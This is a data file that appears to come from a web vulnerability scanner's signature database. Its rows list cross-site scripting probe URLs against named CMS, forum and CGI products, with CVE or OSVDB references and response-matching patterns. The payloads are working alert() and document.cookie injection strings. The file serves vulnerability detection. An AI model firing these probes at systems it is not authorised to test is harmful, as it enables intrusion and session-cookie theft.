"000753","CVE-2002-1007","4","@CGIDIRSlogin.pl?course_id=\"><SCRIPT>alert('Vulnerable')</SCRIPT>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS).","","" "000754","OSVDB-7590","4","@CGIDIRShtsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","htdig is vulnerable to Cross Site Scripting (XSS).","","" "000755","","4","@CGIDIRSFormMail.cgi?<script>alert(\"Vulnerable\");</script>","GET","<script>alert\(\"Vulnerable\"\);<\/script>","","","","","FormMail.cgi allows Cross Site Scripting (XSS).","","" "000756","CVE-2002-0230 https://sourceforge.net/projects/faqomatic/","4","@CGIDIRSfom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) Check for updates.","","" "000757","CVE-2002-2011 https://sourceforge.net/projects/faqomatic/","4","@CGIDIRSfom.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.","","" "000758","","4","@CGIDIRSerba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS).","","" "000759","CVE-2002-1680","4","@CGIDIRSdiagnose.cgi","GET","200","","","","","This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS).","","" "000760","OSVDB-2748","4","@CGIDIRSdansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages.","","" "000761","OSVDB-651","4","@CGIDIRScgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS).","","" "000762","CVE-2002-1006","4","@CGIDIRSbetsie/parserl.pl/<script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BBC Education Text to Speech Internet Enhancer allows Cross Site Scripting (XSS).","","" "000763","CVE-2002-1703 http://www.mewsoft.com/","4","@CGIDIRSauction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mewsoft Auction 3.0 is vulnerable to Cross Site Scripting (XSS).","","" "000764","CVE-2002-2348","4","@CGIDIRSathcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Authoria HR Suite is vulnerable to Cross Site Scripting (XSS).","","" "000765","CVE-2002-0346","4","@CGIDIRS.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS).","","" "000766","CVE-2002-0346","4","@CGIDIRS.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>","GET","img src=javascript:alert\('Vulnerable'\)","","","","","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS).","","" "000767","CA-2000-02","4","/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests.","","" "000768","CA-2000-02","4","/~/<script>alert('Vulnerable')</script>.aspx","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests.","","" "000769","CA-2000-02","4","/~/<script>alert('Vulnerable')</script>.asp","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .asp file requests.","","" "000770","CVE-2002-2350","4","/z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Zorum 2.4 is vulnerable to Cross Site Scripting (XSS).","","" "000771","","4","/catinfo?<b>\">TESTING","GET","<b>\">TESTING","","","","","The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS).","","" "000772","","4","/webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).","","" "000773","CVE-2004-0584","4","/webamil/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS).","","" "000774","OSVDB-59444","4","/users.php?mode=profile&uid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS).","","" "000775","","4","/usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS).","","" "000776","","4","/user.php?op=userinfo&uname=<script>alert('hi');</script>","GET","<script>alert\('hi'\);<\/script>","","","","","The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1.","","" "000777","","4","/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com","GET","javascript:alert\(document\.cookie\)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).","","" "000778","","4","/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com","GET","<script>alert\(document\.cookie\)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).","","" "000779","","4","/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","PHP TopSites allows Cross Site Scripting (XSS).","","" "000780","OSVDB-41361","4","/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)","","","","","MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS).","","" "000781","OSVDB-41361","4","/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)","","","","","MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS).","","" "000782","CVE-2002-0931","4","/supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS).","","" "000783","CVE-2002-0931","4","/supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS).","","" "000784","CVE-2002-0931","4","/supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS).","","" "000785","","4","/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page.","","" "000786","CVE-2001-1524","4","/submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS).","","" "000787","CVE-2002-1732","4","/ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS).","","" "000788","OSVDB-59014","4","/showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS).","","" "000789","","4","/shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script>","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Happymail E-Commerce is vulnerable to Cross Site Scripting (XSS).","","" "000790","CVE-2002-0938","4","/setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS).","","" "000791","","4","/servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>","POST","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS).","","" "000792","OSVDB-2689","4","/servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>","POST","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS).","","" "000793","OSVDB-2689","4","/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page.","","" "000794","","4","/search/index.cfm?<script>alert(\"Vulnerable\")</script>","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Search agent allows Cross Site Scripting (XSS).","","" "000795","","4","/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","ezPublish 2.27 is vulnerable to Cross Site Scripting (XSS).","","" "000796","OSVDB-2669","4","/search.php?zoom_query=<script>alert(\"hello\")</script>","GET","<script>alert\(\"hello\"\)<\/script>","","","","","Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS).","","" "000797","CVE-2003-0614","4","/search.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","","" "000798","OSVDB-50551","4","/search.php?searchfor=\"><script>alert(1776)</script>","GET","<script>alert\(1776\)<\/script>","","","","","Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS).","","" "000799","","4","/search.asp?term=<%00script>alert('Vulnerable')</script>","GET","alert\('Vulnerable'\)<\/script>","","","","","ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this).","","" "000800","","4","/script>alert('Vulnerable')</script>.cfm","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047","","" "000801","","4","/samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "000802","","4","/replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSS).","","" "000803","OSVDB-59443","4","/profiles.php?uid=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS).","","" "000804","","4","/postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft+Utilities\"%3<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS).","","" "000805","","4","/postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PostNuke is vulnerable to Cross Site Scripting (XSS).","","" "000806","OSVDB-4599","4","/pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS).","","" "000807","","4","/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS).","","" "000808","","4","/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS).","","" "000809","","4","/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).","","" "000810","","4","/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).","","" "000811","","4","/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).","","" "000812","","4","/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).","","" "000813","","4","/phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).","","" "000814","CVE-2002-1995","4","/phptonuke.php?filnavn=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS).","","" "000815","CVE-2002-1799","4","/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E","GET","<script>alert\(Vulnerable\)<\/script>","","","","","phpRank is vulnerable to Cross Site Scripting (XSS).","","" "000816","CVE-2007-1287","4","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","","" "000817","CVE-2007-1287","4","/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","","" "000818","CVE-2002-1724","4","/phpimageview.php?pic=javascript:alert(8754)","GET","200","alert\(8754\)","","The\sdocument\shas\smoved","","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).","","" "000819","CVE-2002-1702,http://www.deltascripts.com/","4","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 is vulnerable to Cross Site Scripting (XSS).","","" "000820","CVE-2003-0484","4","/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.","","" "000821","CVE-2003-0484","4","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS).","","" "000822","OSVDB-11145","4","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS).","","" "000823","OSVDB-11144","4","/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS).","","" "000824","","4","/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02","","" "000825","","4","/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS).","","" "000826","","4","/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Vignette server is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.","","" "000827","CVE-2003-1145","4","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","GET","200","","","","","OpenAutoClassifieds 1.0 is vulnerable to a XSS attack","","" "000828","CVE-2003-1145","4","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","GET","<script>alert\(document\.domain\)<\/script>","","","","","OpenAutoClassifieds 1.x is vulnerable to Cross Site Scripting (XSS).","","" "000829","","4","/node/view/666\"><script>alert(document.domain)</script>","GET","<script>alert\(document\.domain\)<\/script>","","","","","Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS).","","" "000830","OSVDB-5106","4","/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "000831","","4","/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>","GET","<script>alert\('Vulnerable'\)\/<script>","","","","","RaQ3 server script is vulnerable to Cross Site Scripting (XSS).","","" "000832","CVE-2003-1372","4","/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=","GET","200","","\[script\]alert\('Vulnerable\)","","","myphpnuke is vulnerable to Cross Site Scripting (XSS).","","" "000833","CVE-2003-1372","4","/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=","GET","200","","<script>alert\('Vulnerable\)","","","myphpnuke is vulnerable to Cross Site Scripting (XSS).","","" "000834","CVE-2003-1372","4","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","GET","200","","\[script\]alert\(document\.cookie\)","","","myphpnuke is vulnerable to Cross Site Scripting (XSS).","","" "000835","CVE-2003-1372","4","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","GET","<script>alert\(document\.cookie\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS).","","" "000836","","4","/myhome.php?action=messages&box=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS).","","" "000837","","4","/msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS).","","" "000838","","4","/msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS).","","" "000839","","4","/msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS).","","" "000840","OSVDB-50539","4","/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\)","","","","","Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS).","","" "000841","","4","/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).","","" "000842","","4","/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).","","" "000843","","4","/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).","","" "000844","","4","/modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).","","" "000845","","4","/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS).","","" "000846","","4","/modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS).","","" "000847","CVE-2002-1070","4","/modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS).","","" "000848","","4","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).","","" "000849","","4","/modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).","","" "000850","","4","/modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke's modules.php is vulnerable to Cross Site Scripting (XSS).","","" "000851","","4","/modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).","","" "000852","","4","/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0","GET","200","javascript:alert\(9456\)","","The\sdocument\shas\smoved","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).","","" "000853","CVE-2001-1523","4","/modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS).","","" "000854","OSVDB-5506","4","/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|","GET","<script>alert\(document\.cookie\)","","","","","PostNuke CMS is vulnerable to Cross Site Scripting (XSS).","","" "000855","","4","/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS).","","" "000856","","4","/modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).","","" "000857","","4","/modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).","","" "000858","CVE-2004-2020","4","/modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).","","" "000859","CVE-2004-2020","4","/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).","","" "000860","OSVDB-5914","4","/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS).","","" "000861","","4","/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).","","" "000862","","4","/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index","GET","200","javascript:alert\(document\.cookie\);","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).","","" "000863","OSVDB-4598","4","/members.asp?SF=%22;}alert(223344);function%20x()\{v%20=%22","GET","200","alert\(223344\)","","The\sdocument\shas\smoved","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS).","","" "000864","OSVDB-3201","4","/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Megabook guestbook is vulnerable to Cross Site Scripting (XSS).","","" "000865","","4","/mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT>","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","Mailman 2.1 is vulnerable to Cross Site Scripting (XSS).","","" "000866","","4","/mailman/listinfo/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix.","","" "000867","OSVDB-2895","4","/ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.","","" "000868","CVE-2002-0504","4","/launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version.","","" "000869","CVE-2002-0504","4","/launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version.","","" "000870","CVE-2002-1053","4","/jigsaw/","GET","200","","","","","Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.","","" "000872","OSVDB-5803","4","/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "000873","OSVDB-2739","4","/index.php?top_message=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS).","","" "000874","OSVDB-50552","4","/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS).","","" "000875","","4","/index.php?catid=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PostNuke is vulnerable to Cross Site Scripting (XSS).","","" "000876","","4","/index.php?action=storenew&username=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page.","","" "000877","http://www.minibb.net","4","/index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MiniBB is vulnerable to Cross Site Scripting (XSS).","","" "000878","","4","/index.php/\"><script><script>alert(document.cookie)</script><","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS).","","" "000879","","4","/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS).","","" 